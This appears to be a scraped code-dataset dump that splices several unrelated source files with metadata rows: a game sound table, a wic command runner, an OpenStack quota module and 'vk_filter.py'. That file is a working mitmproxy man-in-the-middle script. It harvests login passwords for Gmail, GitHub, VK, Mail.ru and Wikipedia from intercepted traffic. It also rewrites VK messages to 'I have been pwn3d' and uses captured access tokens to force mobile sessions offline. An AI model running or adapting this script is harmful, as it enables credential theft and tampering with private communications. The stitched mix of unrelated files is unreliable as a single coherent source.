("woman_yell", sf_priority_9|sf_vol_8, ["woman_yell_1.ogg","woman_yell_2.ogg"]),
("hide", 0, ["s_hide.wav"]),
("unhide", 0, ["s_unhide.wav"]),
("neigh", sf_priority_1|sf_vol_1, []),
("gallop", sf_priority_10|sf_vol_3, ["horse_gallop_3.ogg","horse_gallop_4.ogg","horse_gallop_5.ogg"]),
("battle", sf_priority_10|sf_vol_4, ["battle.ogg"]),
("arrow_hit_body", sf_priority_9|sf_vol_10, ["arrow_hit_body_1.ogg","arrow_hit_body_2.ogg","arrow_hit_body_3.ogg"]),
("metal_hit_low_armor_low_damage", sf_priority_8|sf_vol_9, ["sword_hit_lo_armor_lo_dmg_1.ogg","sword_hit_lo_armor_lo_dmg_2.ogg","sword_hit_lo_armor_lo_dmg_3.ogg"]),
("metal_hit_low_armor_high_damage", sf_priority_10|sf_vol_9, ["sword_hit_lo_armor_hi_dmg_1.ogg","sword_hit_lo_armor_hi_dmg_2.ogg","sword_hit_lo_armor_hi_dmg_3.ogg"]),
("metal_hit_high_armor_low_damage", sf_priority_8|sf_vol_9, ["metal_hit_high_armor_low_damage.ogg","metal_hit_high_armor_low_damage_2.ogg","metal_hit_high_armor_low_damage_3.ogg"]),
("metal_hit_high_armor_high_damage", sf_priority_10|sf_vol_9, ["sword_hit_hi_armor_hi_dmg_1.ogg","sword_hit_hi_armor_hi_dmg_2.ogg","sword_hit_hi_armor_hi_dmg_3.ogg"]),
("wooden_hit_low_armor_low_damage", sf_priority_8|sf_vol_9, ["blunt_hit_low_1.ogg","blunt_hit_low_2.ogg","blunt_hit_low_3.ogg"]),
("wooden_hit_low_armor_high_damage", sf_priority_10|sf_vol_9, ["blunt_hit_high_1.ogg","blunt_hit_high_2.ogg","blunt_hit_high_3.ogg"]),
("wooden_hit_high_armor_low_damage", sf_priority_8|sf_vol_9, ["wooden_hit_high_armor_low_damage_1.ogg","wooden_hit_high_armor_low_damage_2.ogg"]),
("wooden_hit_high_armor_high_damage", sf_priority_10|sf_vol_9, ["blunt_hit_high_1.ogg","blunt_hit_high_2.ogg","blunt_hit_high_3.ogg"]),
("mp_arrow_hit_target", sf_2d|sf_priority_10|sf_vol_9, ["mp_arrow_hit_target.ogg"]),
("blunt_hit", sf_priority_9|sf_vol_9, ["punch_1.ogg","punch_4.ogg","punch_4.ogg","punch_5.ogg"]),
("player_hit_by_arrow", sf_priority_10|sf_vol_10, ["player_hit_by_arrow.ogg"]),
("release_crossbow_medium", sf_priority_4|sf_vol_7, ["release_crossbow_1.ogg"]),
("release_crossbow_far", sf_priority_3|sf_vol_7, ["release_crossbow_1.ogg"]),
("bullet_hit_body", sf_priority_6|sf_vol_7, ["player_hit_by_arrow.ogg"]),
("player_hit_by_bullet", sf_priority_10|sf_vol_10, ["player_hit_by_arrow.ogg"]),
("pistol_shot", sf_priority_12|sf_vol_10, ["fl_pistol.wav"]),
("man_grunt", sf_priority_6|sf_vol_4, ["man_excercise_1.ogg","man_excercise_2.ogg","man_excercise_4.ogg"]),
("man_breath_hard", sf_priority_7|sf_vol_8, ["man_ugh_1.ogg","man_ugh_2.ogg","man_ugh_4.ogg","man_ugh_7.ogg","man_ugh_12.ogg","man_ugh_13.ogg","man_ugh_17.ogg"]),
("man_stun", sf_priority_9|sf_vol_8, ["man_stun_1.ogg"]),
("man_grunt_long", sf_priority_7|sf_vol_7, ["man_grunt_1.ogg","man_grunt_2.ogg","man_grunt_3.ogg","man_grunt_5.ogg","man_grunt_13.ogg","man_grunt_14.ogg"]),
("man_yell", sf_priority_6|sf_vol_8, ["man_yell_4.ogg","man_yell_4_2.ogg","man_yell_7.ogg","man_yell_9.ogg","man_yell_11.ogg","man_yell_13.ogg","man_yell_15.ogg","man_yell_16.ogg","man_yell_17.ogg","man_yell_20.ogg","man_shortyell_4.ogg","man_shortyell_5.ogg","man_shortyell_6.ogg","man_shortyell_9.ogg","man_shortyell_11.ogg","man_shortyell_11b.ogg","man_yell_b_18.ogg","man_yell_22.ogg", "man_yell_c_20.ogg"]),
("man_warcry", sf_priority_8|sf_vol_10, ["man_insult_2.ogg","man_insult_3.ogg","man_insult_7.ogg","man_insult_9.ogg","man_insult_13.ogg","man_insult_15.ogg","man_insult_16.ogg"]),
("encounter_looters", sf_priority_8|sf_vol_8, ["encounter_river_pirates_5.ogg","encounter_river_pirates_6.ogg","encounter_river_pirates_9.ogg","encounter_river_pirates_10.ogg","encounter_river_pirates_4.ogg"]),
("encounter_bandits", sf_priority_8|sf_vol_8, ["encounter_bandit_2.ogg","encounter_bandit_9.ogg","encounter_bandit_12.ogg","encounter_bandit_13.ogg","encounter_bandit_15.ogg","encounter_bandit_16.ogg","encounter_bandit_10.ogg",]),
("encounter_farmers", sf_priority_8|sf_vol_8, ["encounter_farmer_2.ogg","encounter_farmer_5.ogg","encounter_farmer_7.ogg","encounter_farmer_9.ogg"]),
("encounter_sea_raiders", sf_priority_8|sf_vol_8, ["encounter_sea_raider_5.ogg","encounter_sea_raider_9.ogg","encounter_sea_raider_9b.ogg","encounter_sea_raider_10.ogg"]),
("encounter_steppe_bandits", sf_priority_8|sf_vol_8, ["encounter_steppe_bandit_3.ogg","encounter_steppe_bandit_3b.ogg","encounter_steppe_bandit_8.ogg","encounter_steppe_bandit_10.ogg","encounter_steppe_bandit_12.ogg"]),
("encounter_nobleman", sf_priority_8|sf_vol_8, ["encounter_nobleman_1.ogg"]),
("encounter_vaegirs_ally", sf_priority_8|sf_vol_8, ["encounter_vaegirs_ally.ogg","encounter_vaegirs_ally_2.ogg"]),
("encounter_vaegirs_neutral", sf_priority_8|sf_vol_8, ["encounter_vaegirs_neutral.ogg","encounter_vaegirs_neutral_2.ogg","encounter_vaegirs_neutral_3.ogg","encounter_vaegirs_neutral_4.ogg"]),
("encounter_vaegirs_enemy", sf_priority_8|sf_vol_8, ["encounter_vaegirs_neutral.ogg","encounter_vaegirs_neutral_2.ogg","encounter_vaegirs_neutral_3.ogg","encounter_vaegirs_neutral_4.ogg"]),
("sneak_town_halt", sf_priority_8|sf_vol_10, ["sneak_halt_1.ogg","sneak_halt_2.ogg"]),
("horse_walk", sf_priority_3|sf_vol_3, ["horse_walk_1.ogg","horse_walk_2.ogg","horse_walk_3.ogg","horse_walk_4.ogg"]),
("horse_trot", sf_priority_3|sf_vol_3, ["horse_trot_1.ogg","horse_trot_2.ogg","horse_trot_3.ogg","horse_trot_4.ogg"]),
("horse_canter", sf_priority_4|sf_vol_4, ["horse_canter_1.ogg","horse_canter_2.ogg","horse_canter_3.ogg","horse_canter_4.ogg"]),
("horse_gallop", sf_priority_5|sf_vol_4, ["horse_gallop_6.ogg","horse_gallop_7.ogg","horse_gallop_8.ogg","horse_gallop_9.ogg"]),
("horse_breath", sf_priority_1|sf_vol_4, ["horse_breath_4.ogg","horse_breath_5.ogg","horse_breath_6.ogg","horse_breath_7.ogg"]),
("horse_snort", sf_priority_1|sf_vol_1, ["horse_snort_1.ogg","horse_snort_2.ogg","horse_snort_3.ogg","horse_snort_4.ogg","horse_snort_5.ogg"]),
("horse_low_whinny", sf_priority_8|sf_vol_12, ["horse_whinny-1.ogg","horse_whinny-2.ogg"]),
("block_fist", sf_priority_9|sf_vol_10, ["block_fist_3.ogg","block_fist_4.ogg"]),
("man_hit_blunt_weak", sf_priority_9|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_blunt_strong", sf_priority_10|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_pierce_weak", sf_priority_9|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_pierce_strong", sf_priority_10|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_cut_weak", sf_priority_9|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_hit_cut_strong", sf_priority_10|sf_vol_10, ["man_hit_13.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg"]),
("man_victory", sf_priority_5|sf_vol_10, ["man_victory_3.ogg","man_victory_4.ogg","man_victory_5.ogg","man_victory_8.ogg","man_victory_15.ogg","man_victory_49.ogg","man_victory_52.ogg","man_victory_54.ogg","man_victory_57.ogg","man_victory_71.ogg"]),
("fire_loop", sf_priority_5|sf_vol_15|sf_looping|sf_start_at_random_pos, ["Fire_Torch_Loop3.ogg"]),
("torch_loop", sf_priority_4|sf_vol_15|sf_looping|sf_start_at_random_pos, ["Fire_Torch_Loop3.ogg"]),
("dummy_hit", sf_priority_6|sf_vol_10, ["shield_hit_cut_3.ogg","shield_hit_cut_5.ogg"]),
("dummy_destroyed", sf_priority_7|sf_vol_10, ["shield_broken.ogg"]),
("gourd_destroyed", sf_priority_7|sf_vol_10, ["shield_broken.ogg"]),
("cow_moo", sf_priority_6|sf_vol_12, ["cow_moo_1.ogg"]),
("cow_slaughter", sf_priority_9|sf_vol_12, ["cow_slaughter.ogg"]),
("distant_dog_bark", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_dog1.ogg","d_dog2.ogg","d_dog3.ogg","d_dog7.ogg"]),
("distant_owl", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_owl2.ogg","d_owl3.ogg","d_owl4.ogg"]),
("distant_chicken", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_chicken1.ogg","d_chicken2.ogg"]),
("distant_carpenter", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_carpenter1.ogg","d_saw_short3.ogg"]),
("distant_blacksmith", sf_priority_3|sf_vol_15|sf_stream_from_hd, ["d_blacksmith2.ogg"]),
("arena_ambiance", sf_2d|sf_priority_5|sf_vol_15|sf_looping|sf_stream_from_hd, ["arena_loop11.ogg"]),
("town_ambiance", sf_2d|sf_priority_5|sf_vol_15|sf_looping|sf_stream_from_hd, ["town_loop_3.ogg"]),
("tutorial_fail", sf_2d|sf_priority_10|sf_vol_7,["cue_failure.ogg"]),
("your_flag_taken", sf_2d|sf_priority_10|sf_vol_10, ["your_flag_taken.ogg"]),
("enemy_flag_taken", sf_2d|sf_priority_10|sf_vol_10, ["enemy_flag_taken.ogg"]),
("flag_returned", sf_2d|sf_priority_10|sf_vol_10, ["your_flag_returned.ogg"]),
("team_scored_a_point", sf_2d|sf_priority_10|sf_vol_10, ["you_scored_a_point.ogg"]),
("enemy_scored_a_point", sf_2d|sf_priority_10|sf_vol_10, ["enemy_scored_a_point.ogg"]),
("failure", sf_2d|sf_priority_6|sf_vol_5, ["cue_failure.ogg"]),
("man_yawn", sf_priority_6|sf_vol_10, ["man_yawn_1.ogg"]),
("man_cough", sf_priority_6|sf_vol_10, ["man_cough_1.ogg","man_cough_2.ogg","man_cough_3.ogg"]),
("man_drown", sf_priority_9|sf_vol_10, ["man_stun_1.ogg","man_ugh_7.ogg","man_ugh_13.ogg","man_ugh_17.ogg"]),
("woman_drown", sf_priority_9|sf_vol_10, ["woman_hit_b_2.ogg","woman_hit_2.ogg"]),
("cut_wood", sf_priority_9|sf_vol_10, ["shield_hit_cut_3.ogg","shield_hit_cut_5.ogg"]),
("cut_wood_break", sf_priority_10|sf_vol_10, ["shield_hit_cut_4.ogg"]),
("cut_wood_scratch", sf_priority_6|sf_vol_10, ["wooden_hit_high_armor_low_damage_1.ogg","wooden_hit_high_armor_low_damage_2b.ogg"]),
("mining_hit", sf_priority_9|sf_vol_10, ["hit_wood_metal_7.ogg","hit_metal_metal_1.ogg","hit_metal_metal_2.ogg","hit_metal_metal_4.ogg","hit_metal_metal_5.ogg"]),
("mining_scratch", sf_priority_6|sf_vol_10, ["hit_metal_metal_3.ogg","hit_metal_metal_6.ogg"]),
("repair_wood", sf_priority_9|sf_vol_10, ["hit_wood_wood_2.ogg","hit_wood_wood_3.ogg","hit_wood_wood_4.ogg","hit_wood_metal_4.ogg","hit_wood_metal_5.ogg"]),
("saw_wood", sf_priority_7|sf_vol_10, ["d_saw_short3.ogg"]),
("blacksmith", sf_priority_7|sf_vol_10, ["d_blacksmith2.ogg"]),
("damage_ship", sf_priority_9|sf_vol_10, ["shield_broken.ogg"]),
("lock", sf_priority_10|sf_vol_10, ["hit_wood_metal_6.ogg"]),
("pick_lock_fail", sf_priority_10|sf_vol_10, ["hit_wood_wood_1.ogg"]),
("fire", sf_priority_6|sf_vol_10, ["Fire_Small_Crackle_Slick_op.ogg"]),
("horse_neigh", sf_priority_8|sf_vol_10, ["horse_exterior_whinny_01.ogg","horse_exterior_whinny_02.ogg","horse_exterior_whinny_03.ogg","horse_exterior_whinny_04.ogg","horse_exterior_whinny_05.ogg","horse_whinny.ogg"]),
("pull_flax", sf_priority_6|sf_vol_3, ["draw_other.ogg"]),
("away_vile_beggar", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_nobleman_1.ogg"]),
("my_lord", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_farmer_7.ogg","encounter_farmer_9.ogg"]),
("almost_harvesting_season", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_farmer_2.ogg"]),
("whats_this_then", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_river_pirates_5.ogg"]),
("out_for_a_stroll_are_we", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_river_pirates_6.ogg"]),
("we_ride_to_war", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_vaegirs_neutral_2.ogg","encounter_vaegirs_ally.ogg"]),
("less_talking_more_raiding", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_sea_raider_10.ogg"]),
("you_there_stop", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["sneak_halt_1.ogg","sneak_halt_2.ogg"]),
("tear_you_limb_from_limb", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a3.ogg"]),
("better_not_be_a_manhunter", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a1.ogg"]),
("drink_from_your_skull", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a2.ogg"]),
("gods_will_decide_your_fate", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_sea_raider_9.ogg"]),
("nice_head_on_shoulders", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a4.ogg"]),
("hunt_you_down", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_shortyell_a5.ogg","man_yell_a6.ogg"]),
("dead_men_tell_no_tales", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["man_yell_a6.ogg"]),
("leigu", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["tiaozhan.ogg"]),
("leigu2", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["guanyu.ogg"]),
("stand_and_deliver", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_12.ogg"]),
("your_money_or_your_life", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_2.ogg","encounter_steppe_bandit_12.ogg"]),
("have_our_pay_or_fun", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_10.ogg"]),
("word_about_purse_belongings", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_13.ogg"]),
("easy_way_or_hard_way", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_15.ogg"]),
("everything_has_a_price", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_16.ogg"]),
("slit_your_throat", sf_priority_10|sf_vol_10|sf_stream_from_hd, ["encounter_bandit_9.ogg"]),
("sounds_end", 0, []),
]
| bsd-3-clause | -4,885,153,509,289,498,000 | 94.202429 | 413 | 0.672124 | false |
schleichdi2/OPENNFR-6.1-CORE | opennfr-openembedded-core/scripts/lib/wic/utils/runner.py | 1 | 1774 | #!/usr/bin/env python -tt
#
# Copyright (c) 2011 Intel, Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import subprocess
from wic import WicError
def runtool(cmdln_or_args):
""" wrapper for most of the subprocess calls
input:
cmdln_or_args: can be both args and cmdln str (shell=True)
return:
rc, output
"""
if isinstance(cmdln_or_args, list):
cmd = cmdln_or_args[0]
shell = False
else:
import shlex
cmd = shlex.split(cmdln_or_args)[0]
shell = True
sout = subprocess.PIPE
serr = subprocess.STDOUT
try:
process = subprocess.Popen(cmdln_or_args, stdout=sout,
stderr=serr, shell=shell)
sout, serr = process.communicate()
# combine stdout and stderr, filter None out and decode
out = ''.join([out.decode('utf-8') for out in [sout, serr] if out])
except OSError as err:
if err.errno == 2:
# [Errno 2] No such file or directory
raise WicError('Cannot run command: %s, lost dependency?' % cmd)
else:
raise # relay
return process.returncode, out
| gpl-2.0 | 1,398,075,700,761,582,800 | 33.115385 | 76 | 0.651635 | false |
infosec-216/alice | vk_filter.py | 1 | 12539 | import logging
import time
import cStringIO
from PIL import Image
from libmproxy.protocol.http import decoded
import re
import urllib # Russian messages support
from sets import Set
logging.basicConfig(filename="/root/mitm.log",level=logging.DEBUG)
class VK_user:
def __init__(self):
self.id = ""
self.peers = {}
self.messages = []
def __repr__(self):
s = "\n"
s += "User vk id = " + str(self.id) + "\n"
for peer in self.peers.keys():
s += "\tpeer " + peer + ": "
for hs in list(self.peers[peer]):
s += hs + " | "
s += "\n"
s += "\n"
s += "| toUser".ljust(20)+"| Topic".ljust(20)+"| Message".ljust(20)+'\n'
for m in self.messages:
s += str(m[1]).ljust(20) + str(m[2]).ljust(20) + str(m[0]).ljust(20) + "\n"
s += "\n"
return s
class VK_data:
def __init__(self):
self.users = {}
self.current_user = ""
# temp user to store data if we do not currently know the id
self.on_new_id("temp")
self.ips = {}
def from_a_typing(self, string):
m = re.match(r"act=a_typing&al=(?P<al>\d+)&gid=(?P<gid>\d+)&hash=(?P<hash>\w+)&peer=(?P<peer>\d+)", string)
if not m:
logging.debug("from_a_typing: Failed to parse " + string)
return [0]
logging.debug("Typing: al = " + m.group('al') + " gid = " + m.group('gid') +
" hash = " + m.group('hash') + " peer = " + m.group('peer'))
if m.group('peer') not in self.users[self.current_user].peers.keys():
self.users[self.current_user].peers[m.group('peer')] = Set([])
self.users[self.current_user].peers[m.group('peer')].add(m.group('hash'))
return [1]
def from_a_send(self, string):
m = re.match((r"act=a_send&al=(?P<al>\d+)&gid=(?P<gid>\d+)&guid" +
"=(?P<guid>\d+\.?\d*)&hash=(?P<hash>\w+)&media=(?P" +
"<media>\w*)&msg=(?P<msg>[\w\W]*)&title=(?P<title>\w*)" +
"&to=(?P<to>\d+)&ts=(?P<ts>\d+)"), string, re.UNICODE)
if not m:
logging.debug(string)
return [0, string]
# logging.debug("al = " + m.group('al'))
# logging.debug("gid = " + m.group('gid'))
# logging.debug("guid = " + m.group('guid'))
# logging.debug("hash = " + m.group('hash'))
# logging.debug("media = " + m.group('media'))
# logging.debug("msg = " + m.group('msg'))
# logging.debug("title = " + m.group('title'))
# logging.debug("to = " + m.group('to'))
# logging.debug("ts = " + m.group('ts'))
if m.group('to') not in self.users[self.current_user].peers.keys():
self.users[self.current_user].peers[m.group('to')] = Set([])
self.users[self.current_user].peers[m.group('to')].add(m.group('hash'))
self.users[self.current_user].messages.append([m.group('msg'), m.group('to'), m.group('hash')])
logging.debug(str(self.users[self.current_user]))
# Substitute message
string_ = ("act=a_send&al="+m.group('al')+"&gid="+m.group('gid')+"&guid="+
m.group('guid')+"&hash="+m.group('hash')+"&media="+m.group('media')+
"&msg="+"I have been pwn3d"+"&title="+m.group('title')+
"&to="+m.group('to')+"&ts="+m.group('ts'))
return [2, string_]
def from_a_check(self, string):
m_key = re.match(r"act=a_check&key=[\w\W]*", string, re.UNICODE)
m_id = re.match(r"act=a_check&id=(?P<id>\d+)&[\w\W]*", string, re.UNICODE)
if m_key:
return [1]
if m_id:
logging.debug("[a_check]: Found my id: " + m_id.group('id'))
self.on_new_id(m_id.group('id'))
return [1]
logging.debug(string)
return [0]
def decode_request(self, string):
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
logging.debug("Exception in 'decode_request':")
logging.debug(e)
m = re.match(r"act=(?P<type>\w+)&\w+", string)
if not m:
return [0]
if m.group('type') == "a_typing":
return self.from_a_typing(string)
if m.group('type') == "a_send":
return self.from_a_send(string)
if m.group('type') == "a_check":
return self.from_a_check(string)
# No-info types
if m.group('type') == "login":
return [1]
if m.group('type') == "pad":
return [1]
if m.group('type') == "a_friends":
return [1]
if m.group('type') == "a_onlines":
return [1]
if m.group('type') == "a_release":
return [1]
if m.group('type') == "a_get_fast_chat":
return [1]
# logging.debug("Unable to decode type " + m.group('type')
# + "! " + string)
return [0]
def decode_response(self, string):
m = re.match(r"\{\"ts\":(?P<num>\d+),\"updates\":(?P<lstring>[\w\W]+),\"(?P<msg>[\w\W]+)\",\{\}(?P<rstring>[\w\W]*)\}", string)
if not m:
return [0]
self.users[self.current_user].messages.append([m.group('msg'), str(self.users[self.current_user].id), "-"])
logging.debug(str(self.users[self.current_user]))
string_ = "{\"ts\":"+m.group('num')+",\"updates\":"+m.group('lstring')+",\""+"you have been pwn3d"+"\",{}"+m.group('rstring')+"}"
return [2, string_]
def applet_deauth(self, string, ip):
m = re.match(r"[\w\W]+&access_token=(?P<token>[\w\W]*)&v=(?P<v>\d+\.?\d*)", string)
if not m:
return [0]
if ip not in self.ips.keys():
logging.debug("NEW ENTRY; IP = " + str(ip))
self.ips[ip] = [False, m.group('token'), m.group('v')]
if (self.ips[ip][0]):
logging.debug("IP" + str(ip) + " is already processed")
return [1]
return [2, "error=1"]
string_ = ("code=return{offline:API.account.setOffline({}),};&lang=ru&access_token=" +
m.group('token') +"&v=" + m.group('v'))
logging.debug("\nSENDING: " + string_ + "\n")
return [2, string_]
def decode_java(self, string):
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
# logging.debug("Exception in 'decode_java':")
# logging.debug(e)
pass
m = re.match((r"code=var mid = API.messages.send\(\{\"peer_id\":(?P<to>\d+),\"message\":\"(?P<msg>[\w\W]*)\"," +
"\"type\":\"(?P<type>[\w\W]*)\",\"guid\":(?P<guid>\d+),\"attachment\":(?P<att>[\w\W]*)"), string)
#logging.debug(str(string))
if not m:
return [0]
string_ = ("code=var mid = API.messages.send({\"peer_id\":" + m.group('to') + ",\"message\":\"i have been pwn3d\"," +
"\"type\":\"" + m.group('type') + "\",\"guid\":" + m.group('guid') + ",\"attachment\":" + m.group('att'))
return [2, string_]
def on_new_id(self, my_id):
if my_id not in self.users.keys():
self.users[my_id] = VK_user()
self.users[my_id].id = my_id
if (self.current_user == "temp") and (my_id != "temp"):
self.users[my_id] = self.users["temp"]
self.users[my_id].id = my_id
self.users["temp"] = VK_user()
self.current_user = my_id
# logging.debug("Known my_ids: " + str(self.users.keys()))
# logging.debug("Current my_id: " + str(self.current_user))
class PW_data:
def __init__(self):
self.passwords = []
def sniff_passwords(self, string, ip, vk_data):
if ("assword" not in string) and ("asswd" not in string) and ("pass" not in string) and ("Pass" not in string):
return
# logging.debug("STR: " + str(string))
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
# logging.debug("Exception in 'sniff_passwords':")
# logging.debug(e)
return
# Wiki
m = re.match(r"wpName=(?P<login>[^&]*)&wpPassword=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "wikipedia.org", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# Mail.ru
m = re.match(r"Login=(?P<login>[^&]*)&Domain=(?P<domain>[^&]*)&Password=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "mail.ru", m.group('login')+'@'+m.group('domain'), m.group('password')])
logging.debug(str(self))
return
# Github
m = re.match(r"[\w\W]*&login=(?P<login>[^&]*)&password=(?P<password>[^&]*)[\w\W]*", string)
if (m):
self.passwords.append([ip, "github.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# Gmail
m = re.match(r"[\w\W]*&Email=(?P<login>[^&]*)&Passwd=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "gmail.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# vk.com
m = re.match(r"act=login&[\w\W]*&email=(?P<login>[^&]*)&pass=(?P<password>[^&]*)", string)
if (m):
self.passwords.append([ip, "vk.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# vk.com mobile
m = re.match(r"password=(?P<password>[^&]*)&[\w\W]*&username=(?P<login>[^&]*)&[\w\W]*&client_secret=(?P<secret>[^&]*)&client_id=(?P<id>\d+)", string)
if (m):
self.passwords.append([ip, "vk.com (mobile)", m.group('login'), m.group('password')])
logging.debug(str(self))
if ip not in vk_data.ips.keys():
vk_data.ips[ip] = [True, "", ""]
vk_data.ips[ip][0] = True
logging.debug("UNLOCKED IP = " + str(ip))
return
# Other websites
self.passwords.append([ip, string])
logging.debug(str(self))
def __repr__(self):
s = '\n'
s += "user".ljust(30) + "website".ljust(30) + "login".ljust(30) + "password".ljust(20) + '\n'
for entry in self.passwords:
if (len(entry) == 4):
s += entry[0].ljust(30)+entry[1].ljust(30)+entry[2].ljust(30)+entry[3].ljust(20) + '\n'
else:
s += entry[0].ljust(30)+entry[1] + '\n'
s += '\n'
return s
vk_db = VK_data()
pw_db = PW_data()
def request(context, flow):
try:
with decoded(flow.request): # automatically decode gzipped responses.
sourse_ip = str(flow.client_conn.address).split("'")[1]
dest_ip = str(flow.request.host)
#logging.debug("Sending (" + sourse_ip + " -> " + dest_ip + ")")
pw_db.sniff_passwords(str(flow.request.content), sourse_ip, vk_db)
# Regular vk
result = vk_db.decode_request(str(flow.request.content))
if (result[0] == 2):
flow.request.content = result[1]
# vk App deauth
result = vk_db.applet_deauth(str(flow.request.content), sourse_ip)
if (result[0] == 2):
flow.request.content = result[1]
# vk mobile App
result = vk_db.decode_java(str(flow.request.content))
if (result[0] == 2):
flow.request.content = result[1]
except Exception as e:
# logging.debug("Exception in 'request':")
# logging.debug(e)
pass
def response(context, flow):
try:
with decoded(flow.response): # automatically decode gzipped responses.
result = vk_db.decode_response(str(flow.response.content))
if (result[0] == 2):
flow.response.content = result[1]
except Exception as e:
# logging.debug("Exception in 'response':")
# logging.debug(e)
pass
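# Editorial note: these module-level request/response/start hooks follow the
# legacy libmproxy inline-script API, i.e. the file is meant to be loaded with
# something like "mitmdump -s vk_filter.py".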
def start (context, argv):
logging.debug("============================================\n")
logging.debug(time.time())
logging.debug("Startup:\n")
context.log("start")
| mit | -4,966,170,004,822,145,000 | 34.622159 | 157 | 0.490709 | false |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/openstackclient/common/quota.py | 1 | 7859 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Quota action implementations"""
import itertools
import logging
import six
import sys
from cliff import command
from cliff import show
from openstackclient.common import utils
# List the quota items, map the internal argument name to the option
# name that the user sees.
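# (For example, the internal nova key "metadata_items" is exposed on the
# command line as "--properties" by SetQuota.get_parser below.)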
COMPUTE_QUOTAS = {
'cores': 'cores',
'fixed_ips': 'fixed-ips',
'floating_ips': 'floating-ips',
'injected_file_content_bytes': 'injected-file-size',
'injected_file_path_bytes': 'injected-path-size',
'injected_files': 'injected-files',
'instances': 'instances',
'key_pairs': 'key-pairs',
'metadata_items': 'properties',
'ram': 'ram',
'security_group_rules': 'secgroup-rules',
'security_groups': 'secgroups',
}
VOLUME_QUOTAS = {
'gigabytes': 'gigabytes',
'snapshots': 'snapshots',
'volumes': 'volumes',
}
NETWORK_QUOTAS = {
'floatingip': 'floating-ips',
'security_group_rule': 'secgroup-rules',
'security_group': 'secgroups',
}
class SetQuota(command.Command):
"""Set quotas for project or class"""
log = logging.getLogger(__name__ + '.SetQuota')
def get_parser(self, prog_name):
parser = super(SetQuota, self).get_parser(prog_name)
parser.add_argument(
'project',
metavar='<project/class>',
help='Set quotas for this project or class (name/ID)',
)
parser.add_argument(
'--class',
dest='quota_class',
action='store_true',
default=False,
help='Set quotas for <class>',
)
for k, v in itertools.chain(
COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items()):
parser.add_argument(
'--%s' % v,
metavar='<%s>' % v,
type=int,
help='New value for the %s quota' % v,
)
parser.add_argument(
'--volume-type',
metavar='<volume-type>',
help='Set quotas for a specific <volume-type>',
)
return parser
@utils.log_method(log)
def take_action(self, parsed_args):
compute_client = self.app.client_manager.compute
volume_client = self.app.client_manager.volume
compute_kwargs = {}
for k, v in COMPUTE_QUOTAS.items():
value = getattr(parsed_args, k, None)
if value is not None:
compute_kwargs[k] = value
volume_kwargs = {}
for k, v in VOLUME_QUOTAS.items():
value = getattr(parsed_args, k, None)
if value is not None:
if parsed_args.volume_type:
